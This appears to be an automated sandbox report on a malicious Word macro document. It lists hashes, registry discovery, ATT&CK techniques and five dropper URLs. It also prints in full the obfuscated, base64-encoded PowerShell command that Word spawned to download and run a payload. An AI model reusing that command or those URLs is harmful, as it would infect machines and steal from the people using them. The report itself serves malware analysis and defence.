a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe

General

Target

a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe.doc
Size

91KB
MD5

8ab1eb11519d5a556284d0e6d006b331
SHA1

c4689ad2bd4082c3986c747ac25bfd9296097673
SHA256

a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe
SHA512

4c37f58286da386d51f66cc0033456bf76833ed33f8fd57949f767456f49b50769431a7ba413b0cec3260beb3d6f14fa3b6b54214841a21cfd53faa102752ab9

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://oushyn.com/efV5qsN/

exe.dropper

http://valentico.ru/fvxr/

exe.dropper

http://algia.com.ar/L4E6sc/

exe.dropper

http://klusmeier.de/s0UdPE/

exe.dropper

http://zazz.com.br/UIrE4e/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3800	3584	PowersHeLL.exe	67

Blocklisted process makes network request 4 IoCs

flow	pid	Process
33	3800	PowersHeLL.exe
37	3800	PowersHeLL.exe
40	3800	PowersHeLL.exe
42	3800	PowersHeLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3584	WINWORD.EXE
3584	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3800	PowersHeLL.exe
3800	PowersHeLL.exe
3800	PowersHeLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3800	PowersHeLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3584	WINWORD.EXE
3584	WINWORD.EXE
3584	WINWORD.EXE
3584	WINWORD.EXE
3584	WINWORD.EXE
3584	WINWORD.EXE
3584	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 3584 wrote to memory of 3800	3584	WINWORD.EXE	71
PID 3584 wrote to memory of 3800	3584	WINWORD.EXE	71

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a8ede5b4e9ad5f52a3c28142fa26a4c2caa2d9bd9e73aead41942d31986e4abe.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3584
- C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe
  PowersHeLL -e KAAgAG4AZQB3AC0ATwBCAEoARQBDAFQAIAAgAGkAbwAuAEMATwBtAFAAUgBFAHMAUwBpAE8ATgAuAGQARQBGAGwAQQB0AEUAcwB0AFIAZQBBAE0AKAAgAFsAcwB5AFMAVABFAE0ALgBpAG8ALgBtAEUATQBvAFIAeQBzAHQAUgBlAGEAbQBdACAAWwBDAE8ATgB2AGUAUgB0AF0AOgA6AEYAUgBPAE0AQgBBAFMARQA2ADQAUwB0AFIASQBOAGcAKAAgACcAVgBaAEIAdABUADgASQB3AEYARQBiAC8AUwBqADgAcwBHAFkAdgBTAFkAZwBRAE4ATgBDAFkAawBpAGcAWQBFAEoARQA0ADAARQBoAFAAVABkAFgAZQBzAHMAcgBYAFEARgBnAFkAagAvAEgAZQBMAHYAQwBSACsAYQBkAEsAZQA1ACsAVABlAHAAOQA1AGsAVQBKAFQAbQBGAGQAMABoAEMAVQBWAFYAUgBUAC8AQQBMAGQASgBNAHgAaQBxAG4AbgBoADYAVQB5AGUAUQAvAEMAagBmAEcAUQBvADYASABZAFAARQBIAFIAUABlAFoAQQBHAG0AcAAxADMAcwBwAFAAcgBVAEwAKwBxAG0AMQA4AHgAWQBoAGEAbQBuAFMAagBjAFIAYwA1AFEAUwBTADkAOABiAEMARABFAG4ANwBpAEYAWQBzAGMANAByAGcAQwB1AHMAbABTAFYAWgByAGYAUwBZAHMAbQB3AHEAMgBkAHoARABUAHAARgAvAHYAMwBCAGgAKwBaAHIATgBzAGEAWABJAFEAbwBIAEUATQB4AE4AVABHADgAYQBoAHoAWgBpAFUAcgB5AHoAOAB0ADAAbQBUAGMAMQBaADAANgBFAEIAKwBIADgAMAB6AFkAaQB0AC8AMgBBACsAcQB4AFkAbABMAGsAYgBqAHYAdgAwAEIAVgBMAFcATgB2AEsAMQBTAFYAcQBOAHEAOABiAHQAVgBzAFgAeQBCAGEAbQBwADAAZgA3AEIATQBoAFYAeQAvAFcAYgBvAHcAdgBrAGYALwBuAHUAUABNAHIAdQBpAG0ARQBOAFAAawAyAFUAQgBzAGIAVABpAHIAZAA0ADcAagA2AHAAUABoAEkAUwBIAGQAbwBIAFcANgBzADMAMgA4AE8AWAA0AFEAZABWAHkARQB5AHgAKwBGAEYAawBjAEkAcgBpAE4AeABWAGEATABlAFMAMABFAGwAeQBpADQAOABpAEEAaABwAFoAcABXAHgAMQBwAHgAYwBHAFkAMAB6AE8ATgAzAEoAQQBaADMAWABGAG0AZQBiAG8AdAB0AEwAQgBRAFQAWgBXAHgAeQBQAHYARwBuAFQAVwBIAHUAUgBWAEsANABvAEUAegAyAEIAVABvAGIAdgBjAEwAJwAgACkAIAAsACAAWwBJAG8ALgBDAE8AbQBQAHIAZQBTAFMAaQBPAE4ALgBDAE8AbQBQAFIARQBTAHMAaQBvAE4AbQBvAEQAZQBdADoAOgBEAEUAQwBPAG0AcABSAEUAUwBTACAAKQB8ACAARgBvAHIAZQBBAEMASAAtAG8AQgBqAGUAQwB0AHsAbgBlAHcALQBPAEIASgBFAEMAVAAgAHMAWQBzAHQARQBNAC4ASQBPAC4AcwB0AFIAZQBBAG0AcgBlAGEARABFAFIAKAAgACQAXwAsAFsAcwBZAHMAdABFAG0ALgB0AEUAeABUAC4ARQBuAGMAbwBEAGkAbgBnAF0AOgA6AGEAUwBjAEkASQAgACkAfQApAC4AcgBFAEEAZABUAG8AZQBOAEQAKAApACAAfAAgACYAIAAoACAAJABzAGgARQBsAGwAaQBkAFsAMQBdACsAJABzAGgARQBsAEwAaQBkAFsAMQAzAF0AKwAnAFgAJwApAA==
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3800

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3584-115-0x00007FFA6AF00000-0x00007FFA6AF10000-memory.dmp

Filesize
64KB

Download
memory/3584-116-0x00007FFA6AF00000-0x00007FFA6AF10000-memory.dmp

Filesize
64KB

Download
memory/3584-117-0x00007FFA6AF00000-0x00007FFA6AF10000-memory.dmp

Filesize
64KB

Download
memory/3584-118-0x00007FFA6AF00000-0x00007FFA6AF10000-memory.dmp

Filesize
64KB

Download
memory/3584-119-0x00007FFA6AF00000-0x00007FFA6AF10000-memory.dmp

Filesize
64KB

Download
memory/3584-121-0x0000018D07CF0000-0x0000018D07CF2000-memory.dmp

Filesize
8KB

Download
memory/3584-120-0x0000018D07CF0000-0x0000018D07CF2000-memory.dmp

Filesize
8KB

Download
memory/3584-122-0x0000018D07CF0000-0x0000018D07CF2000-memory.dmp

Filesize
8KB

Download
memory/3800-271-0x0000023C68830000-0x0000023C68832000-memory.dmp

Filesize
8KB

Download
memory/3800-274-0x0000023C68833000-0x0000023C68835000-memory.dmp

Filesize
8KB

Download
memory/3800-286-0x0000023C68836000-0x0000023C68838000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads